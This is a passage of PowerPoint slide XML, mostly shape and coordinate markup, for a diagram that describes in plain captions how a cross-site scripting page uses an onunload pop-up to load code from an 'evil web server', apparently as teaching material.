            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5126" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6879432" y="4093368"/>
            <a:ext cx="1752600" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5127" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5953125" y="2971800"/>
            <a:ext cx="1020763" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5128" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5905500" y="3771900"/>
            <a:ext cx="1905000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5129" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3846513"/>
            <a:ext cx="990600" cy="942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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Web page returns with XSS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5130" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7599363" y="3962400"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5131" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7955280" y="3657600"/>
            <a:ext cx="1066800" cy="2432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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>onunload  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>event fires, the browser launches a pop-up that loads malicious code from the evil web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5132" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="4038600"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5133" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7326313" y="3048000"/>
            <a:ext cx="1335087" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Evil Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5134" name="Group 86"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="1676400"/>
            <a:ext cx="892175" cy="1309688"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="5122" name="Object 20"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s1062" name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="2501798" imgH="2616098"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 y="1003"/>
                          <a:ext cx="324" cy="338"/>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5137" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5138" name="Group 89"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5139" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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16"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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16" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
